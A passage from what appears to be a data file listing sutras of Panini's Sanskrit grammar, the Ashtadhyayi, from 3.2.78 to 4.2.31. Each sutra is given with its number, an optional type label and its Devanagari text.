णिनिस्ताच्छिल्ये","3.2.79::कर्तर्युपमाने","3.2.80::व्रते","3.2.81::बहुलमाभीक्ष्ण्ये","3.2.82::मनः","3.2.83::आत्ममाने खश्च","3.2.84:अधिकारः:भूते","3.2.85::करणे यजः","3.2.86::कर्मणि हनः","3.2.87::ब्रह्मभ्रूणवृत्रेषु क्विप्","3.2.88::बहुलं छन्दसि","3.2.89::सुकर्मपापमन्त्रपुण्येषु कृञः","3.2.90::सोमे सुञः","3.2.91::अग्नौ चेः","3.2.92::कर्मण्यग्न्याख्यायाम्","3.2.93::कर्मणीनिर्विक्रियः","3.2.94::दृशेः क्वनिप्","3.2.95::राजनि युधिकृञः","3.2.96::सहे च","3.2.97::सप्तम्यां जनेर्डः","3.2.98::पञ्चम्यामजातौ","3.2.99::उपसर्गे च संज्ञायाम्","3.2.100::अनौ कर्मणि","3.2.101::अन्येष्वपि दृश्यते","3.2.102::निष्ठा","3.2.103::सुयजोर्ङ्वनिप्","3.2.104::जीर्यतेरतृन्","3.2.105::छन्दसि लिट्","3.2.106::लिटः कानज्वा","3.2.107::क्वसुश्च","3.2.108::भाषायां सदवसश्रुवः","3.2.109::उपेयिवाननाश्वाननूचानश्च","3.2.110::लुङ्","3.2.111::अनद्यतने लङ्","3.2.112::अभिज्ञावचने लृट्","3.2.113::न यदि","3.2.114::विभाषा 
साकाङ्क्षे","3.2.115::परोक्षे लिट्","3.2.116::हशश्वतोर्लङ् च","3.2.117::प्रश्ने चासन्नकाले","3.2.118::लट् स्मे","3.2.119::अपरोक्षे च","3.2.120::ननौ पृष्टप्रतिवचने","3.2.121::नन्वोर्विभाषा","3.2.122::पुरि लुङ् चास्मे","3.2.123:अधिकारः:वर्तमाने लट्","3.2.124::लटः शतृशानचावप्रथमासमानाधिकरणे","3.2.125::सम्बोधने च","3.2.126::लक्षणहेत्वोः क्रियायाः","3.2.127:संज्ञा:तौ सत्","3.2.128::पूङ्यजोः शानन्","3.2.129::ताच्छील्यवयोवचनशक्तिषु चानश्","3.2.130::इङ्धार्योः शत्रकृच्छ्रिणि","3.2.131::द्विषोऽमित्रे","3.2.132::सुञो यज्ञसंयोगे","3.2.133::अर्हः पूजायाम्","3.2.134:अधिकारः:आक्वेस्तच्छीलतद्धर्मतत्साधुकारिषु","3.2.135::तृन्","3.2.136::अलंकृञ्निराकृञ्प्रजनोत्पचोत्पतोन्मदरुच्यपत्रपवृतुवृधुसहचर इष्णुच्","3.2.137::णेश्छन्दसि","3.2.138::भुवश्च","3.2.139::ग्लाजिस्थश्च क्स्नुः","3.2.140::त्रसिगृधिधृषिक्षिपेः क्नुः","3.2.141::शमित्यष्टाभ्यो घिनुण्","3.2.142::संपृचानुरुधाङ्यमाङ्यसपरिसृसंसृजपरिदेविसंज्वरपरिक्षिपपरिरटपरिवदपरिदहपरिमुहदुषद्विषद्रुहदुहयुजाक्रीडविविचत्यजरजभजातिचरापचरामुषाभ्याहनश्च","3.2.143::वौ कषलसकत्थस्रम्भः","3.2.144::अपे च लषः","3.2.145::प्रे लपसृद्रुमथवदवसः","3.2.146::निन्दहिंसक्लिशखादविनाशपरिक्षिपपरिरटपरिवादिव्याभाषासूञो वुञ्","3.2.147::देविक्रुशोश्चोपसर्गे","3.2.148::चलनशब्दार्थादकर्मकाद्युच्","3.2.149::अनुदात्तेतश्च हलादेः","3.2.150::जुचङ्क्रम्यदन्द्रम्यसृगृधिज्वलशुचलषपतपदः","3.2.151::क्रुधमण्डार्थेभ्यश्च","3.2.152::न यः","3.2.153::सूददीपदीक्षश्च","3.2.154::लषपतपदस्थाभूवृषहनकमगमशॄभ्य उकञ्","3.2.155::जल्पभिक्षकुट्टलुण्टवृङः षाकन्","3.2.156::प्रजोरिनिः","3.2.157::जिदृक्षिविश्रीण्वमाव्यथाभ्यमपरिभूप्रसूभ्यश्च","3.2.158::स्पृहिगृहिपतिदयिनिद्रातन्द्राश्रद्धाभ्य आलुच्","3.2.159::दाधेट्सिशदसदो रुः","3.2.160::सृघस्यदः क्मरच्","3.2.161::भञ्जभासमिदो घुरच्","3.2.162::विदिभिदिच्छिदेः कुरच्","3.2.163::इण्नश्जिसर्त्तिभ्यः क्वरप्","3.2.164::गत्वरश्च","3.2.165::जागुरूकः","3.2.166::यजजपदशां यङः","3.2.167::नमिकम्पिस्म्यजसकमहिंसदीपो रः","3.2.168::सनाशंसभिक्ष उः","3.2.169::विन्दुरिच्छुः","3.2.170::क्याच्छन्दसि","3.2.171::आदृगमहनजनः किकिनौ लिट् च","3.2.172::स्वपितृषोर्नजिङ्","3.2.173::शॄवन्द्योरारुः","3.2.174::भियः क्रुक्लुकनौ","3.2.175::स्थेशभासपिसकसो वरच्","3.2.176::यश्च यङः","3.2.177::भ्राजभासधुर्विद्युतोर्जिपॄजुग्रावस्तुवः क्विप्","3.2.178::अन्येभ्योऽपि दृश्यते","3.2.179::भुवः संज्ञाऽन्तरयोः","3.2.180::विप्रसम्भ्यो ड्वसंज्ञायाम्","3.2.181::धः कर्मणि ष्ट्रन्","3.2.182::दाम्नीशसयुयुजस्तुतुदसिसिचमिहपतदशनहः करणे","3.2.183::हलसूकरयोः पुवः","3.2.184::अर्तिलूधूसूखनसहचर इत्रः","3.2.185::पुवः संज्ञायाम्","3.2.186::कर्तरि चर्षिदेवतयोः","3.2.187::ञीतः क्तः","3.2.188::मतिबुद्धिपूजार्थेभ्यश्च","3.3.1::उणादयो बहुलम्","3.3.2::भूतेऽपि दृश्यन्ते","3.3.3:अधिकारः:भविष्यति गम्यादयः","3.3.4::यावत्पुरानिपातयोर्लट्","3.3.5::विभाषा कदाकर्ह्योः","3.3.6::किंवृत्ते लिप्सायाम्","3.3.7::लिप्स्यमानसिद्धौ च","3.3.8::लोडर्थलक्षणे च","3.3.9::लिङ् चोर्ध्वमौहूर्तिके","3.3.10::तुमुन्ण्वुलौ क्रियायां क्रियार्थायाम्","3.3.11::भाववचनाश्च","3.3.12::अण् कर्मणि च","3.3.13::लृट् शेषे च","3.3.14::लृटः सद् वा","3.3.15::अनद्यतने लुट्","3.3.16::पदरुजविशस्पृशो घञ्","3.3.17::सृ स्थिरे","3.3.18:अधिकारः:भावे","3.3.19:अधिकारः:अकर्तरि च कारके संज्ञायाम्","3.3.20::परिमणाख्यायां सर्वेभ्यः","3.3.21::इङश्च","3.3.22::उपसर्गे रुवः","3.3.23::समि युद्रुदुवः","3.3.24::श्रिणीभुवोऽनुपसर्गे","3.3.25::वौ क्षुश्रुवः","3.3.26::अवोदोर्नियः","3.3.27::प्रे द्रुस्तुस्रुवः","3.3.28::निरभ्योः पूल्वोः","3.3.29::उन्न्योर्ग्रः","3.3.30::कॄ धान्ये","3.3.31::यज्ञे समि स्तुवः","3.3.32::प्रे स्त्रोऽयज्ञे","3.3.33::प्रथने वावशब्दे","3.3.34::छन्दोनाम्नि च","3.3.35::उदि ग्रहः","3.3.36::समि मुष्टौ","3.3.37::परिन्योर्नीणोर्द्यूताभ्रेषयोः","3.3.38::परावनुपात्यय इणः","3.3.39::व्युपयोः शेतेः 
पर्याये","3.3.40::हस्तादाने चेरस्तेये","3.3.41::निवासचितिशरीरोपसमाधानेष्वादेश्च कः","3.3.42::संघे चानौत्तराधर्ये","3.3.43::कर्मव्यतिहारे णच् स्त्रियाम्","3.3.44::अभिविधौ भाव इनुण्","3.3.45::आक्रोशेऽवन्योर्ग्रहः","3.3.46::प्रे लिप्सायाम्","3.3.47::परौ यज्ञे","3.3.48::नौ वृ धान्ये","3.3.49::उदि श्रयतियौतिपूद्रुवः","3.3.50::विभाषाऽऽङि रुप्लुवोः","3.3.51::अवे ग्रहो वर्षप्रतिबन्धे","3.3.52::प्रे वणिजाम्","3.3.53::रश्मौ च","3.3.54::वृणोतेराच्छादने","3.3.55::परौ भुवोऽवज्ञाने","3.3.56::एरच्","3.3.57::ऋदोरप्","3.3.58::ग्रहवृदृनिश्चिगमश्च","3.3.59::उपसर्गेऽदः","3.3.60::नौ ण च","3.3.61::व्यधजपोरनुपसर्गे","3.3.62::स्वनहसोर्वा","3.3.63::यमः समुपनिविषु","3.3.64::नौ गदनदपठस्वनः","3.3.65::क्वणो वीणायां च","3.3.66::नित्यं पणः परिमाणे","3.3.67::मदोऽनुपसर्गे","3.3.68::प्रमदसम्मदौ हर्षे","3.3.69::समुदोरजः पशुषु","3.3.70::अक्षेषु ग्लहः","3.3.71::प्रजने सर्तेः","3.3.72::ह्वः सम्प्रसारणं च न्यभ्युपविषु","3.3.73::आङि युद्धे","3.3.74::निपानमाहावः","3.3.75::भावेऽनुपसर्गस्य","3.3.76::हनश्च वधः","3.3.77::मूर्तौ घनः","3.3.78::अन्तर्घनो देशे","3.3.79::अगारैकदेशे प्रघणः प्रघाणश्च","3.3.80::उद्घनोऽत्याधानम्","3.3.81::अपघनोऽङ्गम्","3.3.82::करणेऽयोविद्रुषु","3.3.83::स्तम्बे क च","3.3.84::परौ घः","3.3.85::उपघ्न आश्रये","3.3.86::संघोद्घौ गणप्रशंसयोः","3.3.87::निघो निमितम्","3.3.88::ड्वितः क्त्रिः","3.3.89::ट्वितोऽथुच्","3.3.90::यजयाचयतविच्छप्रच्छरक्षो नङ्","3.3.91::स्वपो नन्","3.3.92::उपसर्गे घोः किः","3.3.93::कर्मण्यधिकरणे च","3.3.94:अधिकारः:स्त्रियां क्तिन्","3.3.95::स्थागापापचां भावे","3.3.96::मन्त्रे वृषेषपचमनविदभूवीरा उदात्तः","3.3.97::ऊतियूतिजूतिसातिहेतिकीर्तयश्च","3.3.98::व्रजयजोर्भावे क्यप्","3.3.99::संज्ञायां समजनिषदनिपतमनविदषुञ्शीङ्भृञिणः","3.3.100::कृञः श च","3.3.101::इच्छा","3.3.102::अ प्रत्ययात्","3.3.103::गुरोश्च हलः","3.3.104::षिद्भिदादिभ्योऽङ्","3.3.105::चिन्तिपूजिकथिकुम्बिचर्चश्च","3.3.106::आतश्चोपसर्गे","3.3.107::ण्यासश्रन्थो युच्","3.3.108::रोगाख्यायां ण्वुल् बहुलम्","3.3.109::संज्ञायाम्","3.3.110::विभाषाऽऽख्यानपरिप्रश्नयोरिञ् च","3.3.111::पर्यायार्हर्णोत्पत्तिषु ण्वुच्","3.3.112::आक्रोशे नञ्यनिः","3.3.113::कृत्यल्युटो बहुलम्","3.3.114::नपुंसके भावे क्तः","3.3.115::ल्युट् च","3.3.116::कर्मणि च येन संस्पर्शात् कर्तुः शरीरसुखम्","3.3.117:अधिकारः:करणाधिकरणयोश्च","3.3.118::पुंसि संज्ञायां घः प्रायेण","3.3.119::गोचरसंचरवहव्रजव्यजापणनिगमाश्च","3.3.120::अवे तॄस्त्रोर्घञ्","3.3.121::हलश्च","3.3.122::अध्यायन्यायोद्यावसंहाराधारावयाश्च","3.3.123::उदङ्कोऽनुदके","3.3.124::जालमानायः","3.3.125::खनो घ च","3.3.126::ईषद्दुःसुषु कृच्छ्राकृच्छ्रार्थेषु खल्","3.3.127::कर्तृकर्मणोश्च भूकृञोः","3.3.128::आतो युच्","3.3.129::छन्दसि गत्यर्थेभ्यः","3.3.130::अन्येभ्योऽपि दृश्यते","3.3.131:अतिदेशः:वर्तमानसामीप्ये वर्तमानवद्वा","3.3.132::आशंसायां भूतवच्च","3.3.133::क्षिप्रवचने लृट्","3.3.134::आशंसावचने लिङ्","3.3.135:अतिदेशः:नानद्यतनवत् क्रियाप्रबन्धसामीप्ययोः","3.3.136::भविष्यति मर्यादावचनेऽवरस्मिन्","3.3.137::कालविभागे चानहोरात्राणाम्","3.3.138::परस्मिन् विभाषा","3.3.139::लिङ्निमित्ते लृङ् क्रियाऽतिपत्तौ","3.3.140::भूते च","3.3.141::वोताप्योः","3.3.142::गर्हायां लडपिजात्वोः","3.3.143::विभाषा कथमि लिङ् च","3.3.144::किंवृत्ते लिङ्लृटौ","3.3.145::अनवकॢप्त्यमर्षयोरकिंवृत्ते अपि","3.3.146::किंकिलास्त्यर्थेषु लृट्","3.3.147::जातुयदोर्लिङ्","3.3.148::यच्चयत्रयोः","3.3.149::गर्हायां च","3.3.150::चित्रीकरणे च","3.3.151::शेषे लृडयदौ","3.3.152::उताप्योः समर्थयोर्लिङ्","3.3.153::कामप्रवेदनेऽकच्चिति","3.3.154::सम्भवानेऽलमिति चेत् सिद्धाप्रयोगे","3.3.155::विभाषा धातौ सम्भावनवचनेऽयदि","3.3.156::हेतुहेतुमतोर्लिङ्","3.3.157::इच्छार्थेषु लिङ्लोटौ","3.3.158::समानकर्तृकेषु तुमुन्","3.3.159::लिङ् च","3.3.160::इच्छार्थेभ्यो विभाषा 
वर्तमाने","3.3.161::विधिनिमन्त्रणामन्त्रणाधीष्टसंप्रश्नप्रार्थनेषु लिङ्","3.3.162::लोट् च","3.3.163::प्रैषातिसर्गप्राप्तकालेषु कृत्याश्च","3.3.164::लिङ् चोर्ध्वमौहूर्तिके","3.3.165::स्मे लोट्","3.3.166::अधीष्टे च","3.3.167::कालसमयवेलासु तुमुन्","3.3.168::लिङ् यदि","3.3.169::अर्हे कृत्यतृचश्च","3.3.170::आवश्यकाधमर्ण्ययोर्णिनिः","3.3.171::कृत्याश्च","3.3.172::शकि लिङ् च","3.3.173::आशिषि लिङ्लोटौ","3.3.174::क्तिच्क्तौ च संज्ञायाम्","3.3.175::माङि लुङ्","3.3.176::स्मोत्तरे लङ् च","3.4.1::धातुसम्बन्धे प्रत्ययाः","3.4.2::क्रियासमभिहारे लोट्; लोटो हिस्वौ; वा च तध्वमोः","3.4.3::समुच्चयेऽन्यतरस्याम्","3.4.4::यथाविध्यनुप्रयोगः पूर्वस्मिन्","3.4.5::समुच्चये सामान्यवचनस्य","3.4.6::छन्दसि लुङ्लङ्लिटः","3.4.7::लिङर्थे लेट्","3.4.8::उपसंवादाशङ्कयोश्च","3.4.9::तुमर्थे सेसेनसेअसेन्क्सेकसेनध्यैअध्यैन्कध्यैकध्यैन्शध्यैशध्यैन्तवैतवेङ्तवेनः","3.4.10::प्रयै रोहिष्यै अव्यथिष्यै","3.4.11::दृशे विख्ये च","3.4.12::शकि णमुल्कमुलौ","3.4.13::ईश्वरे तोसुन्कसुनौ","3.4.14::कृत्यार्थे तवैकेन्केन्यत्वनः","3.4.15::अवचक्षे च","3.4.16::भावलक्षणे स्थेण्कृञ्वदिचरिहुतमिजनिभ्यस्तोसुन्","3.4.17::सृपितृदोः कसुन्","3.4.18::अलङ्खल्वोः प्रतिषेधयोः प्राचां क्त्वा","3.4.19::उदीचां माङो व्यतीहारे","3.4.20::परावरयोगे च","3.4.21::समानकर्तृकयोः पूर्वकाले","3.4.22::आभीक्ष्ण्ये णमुल् च","3.4.23::न यद्यनाकाङ्क्षे","3.4.24::विभाषाऽग्रेप्रथमपूर्वेषु","3.4.25::कर्मण्याक्रोशे कृञः खमुञ्","3.4.26::स्वादुमि णमुल्","3.4.27::अन्यथैवंकथमित्थंसु सिद्धाप्रयोगश्चेत्","3.4.28::यथातथयोरसूयाप्रतिवचने","3.4.29::कर्मणि दृशिविदोः साकल्ये","3.4.30::यावति विन्दजीवोः","3.4.31::चर्मोदरयोः पूरेः","3.4.32::वर्षप्रमाण ऊलोपश्चास्यान्यतरस्याम्","3.4.33::चेले क्नोपेः","3.4.34::निमूलसमूलयोः कषः","3.4.35::शुष्कचूर्णरूक्षेषु पिषः","3.4.36::समूलाकृतजीवेषु हन्कृञ्ग्रहः","3.4.37::करणे हनः","3.4.38::स्नेहने पिषः","3.4.39::हस्ते वर्त्तिग्रहोः","3.4.40::स्वे पुषः","3.4.41::अधिकरणे बन्धः","3.4.42::संज्ञायाम्","3.4.43::कर्त्रोर्जीवपुरुषयोर्नशिवहोः","3.4.44::ऊर्ध्वे शुषिपूरोः","3.4.45::उपमाने कर्मणि च","3.4.46::कषादिषु यथाविध्यनुप्रयोगः","3.4.47::उपदंशस्तृतीयायाम्","3.4.48::हिंसार्थानां च समानकर्मकाणाम्","3.4.49::सप्तम्यां चोपपीडरुधकर्षः","3.4.50::समासत्तौ","3.4.51::प्रमाणे च","3.4.52::अपादाने परीप्सायाम्","3.4.53::द्वितीयायां च","3.4.54::स्वाङ्गेऽध्रुवे","3.4.55::परिक्लिश्यमाने च","3.4.56::विशिपतिपदिस्कन्दां व्याप्यमानासेव्यमानयोः","3.4.57::अस्यतितृषोः क्रियाऽन्तरे कालेषु","3.4.58::नाम्न्यादिशिग्रहोः","3.4.59::अव्ययेऽयथाभिप्रेताख्याने कृञः क्त्वाणमुलौ","3.4.60::तिर्यच्यपवर्गे","3.4.61::स्वाङ्गे तस्प्रत्यये कृभ्वोः","3.4.62::नाधाऽर्थप्रत्यये च्व्यर्थे","3.4.63::तूष्णीमि भुवः","3.4.64::अन्वच्यानुलोम्ये","3.4.65::'शकधृषज्ञाग्लाघटरभलभक्रमसहार्हास्त्यर्थेषु तुमुन्","3.4.66::पर्याप्तिवचनेष्वलमर्थेषु","3.4.67::कर्तरि कृत्","3.4.68::भव्यगेयप्रवचनीयोपस्थानीयजन्याप्लाव्यापात्या वा","3.4.69::लः कर्मणि च भावे चाकर्मकेभ्यः.","3.4.70::तयोरेव कृत्यक्तखलर्थाः","3.4.71::अदिकर्मणि क्तः कर्तरि च","3.4.72::गत्यर्थाकर्मकश्लिषशीङ्स्थाऽऽसवसजनरुहजीर्यतिभ्यश्च","3.4.73::दाशगोघ्नौ सम्प्रदाने","3.4.74::भीमादयोऽपादाने","3.4.75::ताभ्यामन्यत्रोणादयः","3.4.76::क्तोऽधिकरणे च ध्रौव्यगतिप्रत्यवसानार्थेभ्यः","3.4.77:अधिकारः:लस्य","3.4.78::तिप्तस्झिसिप्थस्थमिब्वस्मस् तातांझथासाथांध्वमिड्वहिमहिङ्","3.4.79::टित आत्मनेपदानां टेरे","3.4.80::थासस्से","3.4.81::लिटस्तझयोरेशिरेच्","3.4.82::परस्मैपदानां णलतुसुस्थलथुसणल्वमाः","3.4.83::विदो लटो वा","3.4.84::ब्रुवः पञ्चानामादित आहो ब्रुवः","3.4.85:अतिदेशः:लोटो लङ्वत्","3.4.86::एरुः","3.4.87:अतिदेशः:सेर्ह्यपिच्च","3.4.88::वा छन्दसि","3.4.89::मेर्निः","3.4.90::आमेतः","3.4.91::सवाभ्यां वामौ","3.4.92:अतिदेशः:आडुत्तमस्य पिच्च","3.4.93::एत ऐ","3.4.94::लेटोऽडाटौ","3.4.95::आत 
ऐ","3.4.96::वैतोऽन्यत्र","3.4.97::इतश्च लोपः परस्मैपदेषु","3.4.98::स उत्तमस्य","3.4.99::नित्यं ङितः","3.4.100::इतश्च","3.4.101::तस्थस्थमिपां तांतंतामः","3.4.102::लिङस्सीयुट्","3.4.103::यासुट् परस्मैपदेषूदात्तो ङिच्च","3.4.104::किदाशिषि","3.4.105::झस्य रन्","3.4.106::इटोऽत्","3.4.107::सुट् तिथोः","3.4.108::झेर्जुस्","3.4.109::सिजभ्यस्तविदिभ्यः च","3.4.110::आतः","3.4.111::लङः शाकटायनस्यैव","3.4.112::द्विषश्च","3.4.113:संज्ञा:तिङ्शित्सार्वधातुकम्","3.4.114:संज्ञा:आर्द्धधातुकं शेषः","3.4.115:संज्ञा:लिट् च","3.4.116:संज्ञा:लिङाशिषि","3.4.117:संज्ञा:छन्दस्युभयथा","4.1.1:अधिकारः:ङ्याप्प्रातिपदिकात्","4.1.2::स्वौजसमौट्छष्टाभ्याम्भिस्ङेभ्याम्भ्यस्ङसिभ्याम्भ्यस्ङसोसाम्ङ्योस्सुप्","4.1.3:अधिकारः:स्त्रियाम्","4.1.4::अजाद्यतष्टाप्","4.1.5::ऋन्नेभ्यो ङीप्","4.1.6::उगितश्च","4.1.7::वनो र च","4.1.8::पादोऽन्यतरस्याम्","4.1.9::टाबृचि","4.1.10::न षट्स्वस्रादिभ्यः","4.1.11::मनः","4.1.12::अनो बहुव्रीहेः","4.1.13::डाबुभाभ्यामन्यतरस्याम्","4.1.14:अधिकारः:अनुपसर्जनात्","4.1.15::टिड्ढाणञ्द्वयसज्दघ्नञ्मात्रच्तयप्ठक्ठञ्कञ्क्वरपः","4.1.16::यञश्च","4.1.17::प्राचां ष्फ तद्धितः","4.1.18::सर्वत्र लोहितादिकतान्तेभ्यः","4.1.19::कौरव्यमाण्डूकाभ्यां च","4.1.20::वयसि प्रथमे","4.1.21::द्विगोः","4.1.22::अपरिमाणबिस्ताचितकम्बल्येभ्यो न तद्धितलुकि","4.1.23::काण्डान्तात् क्षेत्रे","4.1.24::पुरुषात् प्रमाणेऽन्यतरस्याम्","4.1.25::बहुव्रीहेरूधसो ङीष्।","4.1.26::संख्याऽव्ययादेर्ङीप्","4.1.27::दामहायनान्ताच्च","4.1.28::अन उपधालोपिनोन्यतरस्याम्","4.1.29::नित्यं संज्ञाछन्दसोः","4.1.30::केवलमामकभागधेयपापापरसमानार्यकृत-सुमङ्गलभेषजाच्च","4.1.31::रात्रेश्चाजसौ","4.1.32::अन्तर्वत्पतिवतोर्नुक्","4.1.33::पत्युर्नो यज्ञसंयोगे","4.1.34::विभाषा सपूर्वस्य","4.1.35::नित्यं सपत्न्य्आदिषु","4.1.36::पूतक्रतोरै च","4.1.37::वृषाकप्यग्निकुसितकुसीदानामुदात्तः","4.1.38::मनोरौ वा","4.1.39::वर्णादनुदात्तात्तोपधात्तो नः","4.1.40::अन्यतो ङीष्।","4.1.41::षिद्गौरादिभ्यश्च","4.1.42::जानपदकुण्डगोणस्थलभाजनागकालनीलकुशकामुककबराद्वृत्त्यमत्रावपनाकृत्रिमाश्राणास्थौल्यवर्णानाच्छादनायोविकारमैथुनेच्छाकेशवेशेषु","4.1.43::शोणात् प्राचाम्","4.1.44::वोतो गुणवचनात्","4.1.45::बह्वादिभ्यश्च","4.1.46::नित्यं छन्दसि","4.1.47::भुवश्च","4.1.48::पुंयोगादाख्यायाम्","4.1.49::इन्द्रवरुणभवशर्वरुद्रमृडहिमारण्ययवयवनमातुलाचार्याणामानुक्","4.1.50::क्रीतात् करणपूर्वात्","4.1.51::क्तादल्पाख्यायाम्","4.1.52::बहुव्रीहेश्चान्तोदात्तात्","4.1.53::अस्वाङ्गपूर्वपदाद्वा","4.1.54::स्वाङ्गाच्चोपसर्जनादसंयोगोपधात्","4.1.55::नासिकोदरौष्ठजङ्घादन्तकर्णशृङ्गाच्च","4.1.56::न क्रोडादिबह्वचः","4.1.57::सहनञ्विद्यमानपूर्वाच्च","4.1.58::नखमुखात् संज्ञायाम्","4.1.59::दीर्घजिह्वी च च्छन्दसि","4.1.60::दिक्पूर्वपदान्ङीप्","4.1.61::वाहः","4.1.62::सख्यशिश्वीति भाषायाम्","4.1.63::जातेरस्त्रीविषयादयोपधात्","4.1.64::पाककर्णपर्णपुष्पफलमूलबालोत्तरपदाच्च","4.1.65::इतो मनुष्यजातेः","4.1.66::ऊङुतः","4.1.67::बाह्वन्तात् संज्ञायाम्","4.1.68::पङ्गोश्च","4.1.69::ऊरूत्तरपदादौपम्ये","4.1.70::संहितशफलक्षणवामादेश्च","4.1.71::कद्रुकमण्डल्वोश्छन्दसि","4.1.72::संज्ञायाम्","4.1.73::शार्ङ्गरवाद्यञो ङीन्","4.1.74::यङश्चाप्","4.1.75::आवट्याच्च","4.1.76:संज्ञा; अधिकारः:तद्धिताः","4.1.77::यूनस्तिः","4.1.78::अणिञोरनार्षयोर्गुरूपोत्तमयोः ष्यङ् गोत्रे","4.1.79::गोत्रावयवात्","4.1.80::क्रौड्यादिभ्यश्च","4.1.81::दैवयज्ञिशौचिवृक्षिसात्यमुग्रिकाण्ठेविद्धिभ्योऽन्यतरस्याम्","4.1.82:अधिकारः:समर्थानां प्रथमाद्वा","4.1.83:अधिकारः:प्राग्दीव्यतोऽण्","4.1.84::अश्वपत्यादिभ्यश्च","4.1.85::दित्यदित्यादित्यपत्युत्तरपदाण्ण्यः","4.1.86::उत्सादिभ्योऽञ्","4.1.87::स्त्रीपुंसाभ्यां नञ्स्नञौ भवनात्","4.1.88::द्विगोर्लुगनपत्ये","4.1.89::गोत्रेऽलुगचि","4.1.90::यूनि लुक्","4.1.91::फक्फिञोरन्यतरस्याम्","4.1.92:अधिकारः:तस्यापत्यम्","4.1.93::एको 
गोत्रे","4.1.94::गोत्राद्यून्यस्त्रियाम्","4.1.95::अत इञ्","4.1.96::बाह्वादिभ्यश्च","4.1.97::सुधातुरकङ् च","4.1.98::गोत्रे कुञ्जादिभ्यश्च्फञ्","4.1.99::नडादिभ्यः फक्","4.1.100::हरितादिभ्योऽञः","4.1.101::यञिञोश्च","4.1.102::शरद्वच्छुनकदर्भाद्भृगुवत्साग्रायणेषु","4.1.103::द्रोणपर्वतजीवन्तादन्यतरयाम्","4.1.104::अनृष्यानन्तर्ये बिदादिभ्योऽञ्","4.1.105::गर्गादिभ्यो यञ्","4.1.106::मधुबभ्र्वोर्ब्राह्मणकौशिकयोः","4.1.107::कपिबोधादाङ्गिरसे","4.1.108::वतण्डाच्च","4.1.109::लुक् स्त्रियाम्","4.1.110::अश्वादिभ्यः फञ्","4.1.111::भर्गात् त्रैगर्ते","4.1.112::शिवादिभ्योऽण्","4.1.113::अवृद्धाभ्यो नदीमानुषीभ्यस्तन्नामिकाभ्यः","4.1.114::ऋष्यन्धकवृष्णिकुरुभ्यश्च","4.1.115::मातुरुत् संख्यासम्भद्रपूर्वायाः","4.1.116::कन्यायाः कनीन च","4.1.117::विकर्णशुङ्गच्छगलाद्वत्सभरद्वाजात्रिषु","4.1.118::पीलाया वा","4.1.119::ढक् च मण्डूकात्","4.1.120::स्त्रीभ्यो ढक्","4.1.121::द्व्यचः","4.1.122::इतश्चानिञः","4.1.123::शुभ्रादिभ्यश्च","4.1.124::विकर्णकुषीतकात् काश्यपे","4.1.125::भ्रुवो वुक् च","4.1.126::कल्याण्यादीनामिनङ्","4.1.127::कुलटाया वा","4.1.128::चटकाया ऐरक्","4.1.129::गोधाया ढ्रक्","4.1.130::आरगुदीचाम्","4.1.131::क्षुद्राभ्यो वा","4.1.132::पितृष्वसुश्छण्","4.1.133::ढकि लोपः","4.1.134::मातृष्वसुश्च","4.1.135::चतुष्पाद्भ्यो ढञ्","4.1.136::गृष्ट्यादिभ्यश्च","4.1.137::राजश्वशुराद्यत्","4.1.138::क्षत्राद्घः","4.1.139::कुलात् खः","4.1.140::अपूर्वपदादन्यतरस्यां यड्ढकञौ","4.1.141::महाकुलादञ्खञौ","4.1.142::दुष्कुलाड्ढक्","4.1.143::स्वसुश्छः","4.1.144::भ्रातुर्व्यच्च","4.1.145::व्यन् सपत्ने","4.1.146::रेवत्यादिभ्यष्ठक्","4.1.147::गोत्रस्त्रियाः कुत्सने ण च","4.1.148::वृद्धाट्ठक् सौवीरेषु बहुलम्","4.1.149::फेश्छ च","4.1.150::फाण्टाहृतिमिमताभ्यां णफिञौ","4.1.151::कुर्वादिभ्यो ण्यः","4.1.152::सेनान्तलक्षणकारिभ्यश्च","4.1.153::उदीचामिञ्","4.1.154::तिकादिभ्यः फिञ्","4.1.155::कौसल्यकार्मार्याभ्यां च","4.1.156::अणो द्व्यचः","4.1.157::उदीचां वृद्धादगोत्रात्","4.1.158::वाकिनादीनां कुक् च","4.1.159::पुत्रान्तादन्यतरस्याम्","4.1.160::प्राचामवृद्धात् फिन् बहुलम्","4.1.161::मनोर्जातावञ्यतौ षुक् च","4.1.162:संज्ञा:अपत्यं पौत्रप्रभृति गोत्रम्","4.1.163:संज्ञा:जीवति तु वंश्ये युवा","4.1.164:संज्ञा:भ्रातरि च ज्यायसि","4.1.165:संज्ञा:वाऽन्यस्मिन् सपिण्डे स्थविरतरे जीवति","4.1.166::वृद्धस्य च पूजायाम्","4.1.167::यूनश्च कुत्सायाम्","4.1.168::जनपदशब्दात् क्षत्रियादञ्","4.1.169::साल्वेयगान्धारिभ्यां च","4.1.170::द्व्यञ्मगधकलिङ्गसूरमसादण्","4.1.171::वृद्धेत्कोसलाजादाञ्ञ्यङ्","4.1.172::कुरुणादिभ्यो ण्यः","4.1.173::साल्वावयवप्रत्यग्रथकलकूटाश्मकादिञ्","4.1.174:संज्ञा:ते तद्राजाः","4.1.175::कम्बोजाल्लुक्","4.1.176::स्त्रियामवन्तिकुन्तिकुरुभ्यश्च","4.1.177::अतश्च","4.1.178::न प्राच्यभर्गादियौधेयादिभ्यः","4.2.1::तेन रक्तं रागात्","4.2.2::लाक्षारोचना{शकलकर्दमा}ट्ठक्","4.2.3::नक्षत्रेण युक्तः कालः","4.2.4::लुबविशेषे","4.2.5::संज्ञायां श्रवणाश्वत्थाभ्याम्","4.2.6::द्वंद्वाच्छः","4.2.7::दृष्ट्अं साम","4.2.8::कलेर्ढक्","4.2.9::वामदेवाड्ड्यड्ड्यौ","4.2.10::परिवृतो रथः","4.2.11::पाण्डुकम्बलादिनिः","4.2.12::द्वैपवैयाघ्रादञ्","4.2.13::कौमारापूर्ववचने","4.2.14::तत्रोद्धृतममत्रेभ्यः","4.2.15::स्थण्डिलाच्छयितरि व्रते","4.2.16::संस्कृतं भक्षाः","4.2.17::शूलोखाद्यत्","4.2.18::दध्नष्ठक्","4.2.19::उदश्वितोऽन्यतरस्याम्","4.2.20::क्षीराड्ढञ्","4.2.21::साऽस्मिन् पौर्णमासीति {संज्ञायाम्}","4.2.22::आग्रहायण्यश्वत्थाट्ठक्","4.2.23::विभाषा फाल्गुनीश्रवणाकार्त्तिकीचैत्रीभ्यः","4.2.24::साऽस्य देवता","4.2.25::कस्येत्","4.2.26::शुक्राद्घन्","4.2.27::अपोनप्त्रपान्नप्तृभ्यां घः","4.2.28::छ च","4.2.29::महेन्द्राद्घाणौ च","4.2.30::सोमाट्ट्यण्","4.2.31::वाय्वृतुपित्रुषसो 